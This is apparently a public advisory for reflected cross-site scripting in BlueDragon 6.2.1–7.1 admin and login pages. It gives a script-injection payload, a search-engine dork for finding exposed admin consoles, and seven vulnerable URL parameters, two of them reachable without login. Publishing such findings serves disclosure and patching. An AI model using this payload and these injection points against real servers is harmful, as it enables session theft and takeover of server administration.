BlueDragon 6.2.1 / 7.0 / 7.1 Cross Site Scripting

`I. VULNERABILITY  
  
BlueDragon 6.2.1, 7.0, 7.1 Reflected Cross-Site Scripting  
  
II. SOURCE:  
  
http://www.newatlanta.com/c/products/bluedragon/download/home  
  
III. BACKGROUND  
  
BlueDragon is a family of runtime server-side products for the deployment  
of ColdFusion Markup Language (CFML) pages - with native technology  
plataform  
integration on the operation system web server anda database of your choice.  
  
IV. NEW ATLANTA BUG TRACKING VULNERABILITY ID  
  
# 3435  
  
VI. VENDOR RESPONSE  
  
  
V. TECHNICAL DETAILS  
  
# Exploit Title: BlueDragon Enterprise Server Multiple XSS Vulnerabilities  
# Google Dork: "BlueDragon Administration"  
# Date: 21/07/2015  
# Author: www.newatlanta.com  
# Software Link: www.newatlanta.com/bluedragon/  
# Version: 6.2.1, 7.0, 7.1  
# Exploit Discovered : Glaysson Santos  
# Website : di9jun9.blogspot.com  
  
To reproduce this Flaw, put javascript XSS Payload  
(i.e:"><script>alert("0cn1")</script>)  
in the "XSS" bellow:  
  
  
- without authentication  
  
http://[TARGET]/bluedragon/admin.cfm?MESSAGE=XSS  
http://[TARGET]/bluedragon/login.cfm?MESSAGE=XSS  
  
- authenticated - affected scripts  
  
http://  
[TARGET:PORT]/bluedragon/admin/collectionIndex.cfm?CollectionName=test.col&CollectionLanguage=XSS  
  
http://  
[TARGET:PORT]/bluedragon/admin/caching.cfm?MESSAGE=XSS&ACTION=FLUSHFILECACHE  
  
http://  
[TARGET:PORT]/bluedragon/admin/cfmapping_edit.cfm?STATUS=NOK&MESSAGE=XSS&ID=1&DNAME=/c:&isGlobal=XSS  
  
http://[TARGET:PORT]/bluedragon/admin/font.cfm?STATUS=OK&MESSAGE=XSS  
  
http://[TARGET:PORT]/bluedragon/admin/datasources_wizard1.cfm?MESSAGE=XSS  
  
  
The javascript will execute and display "0cn1"  
  
  
Greetings  
`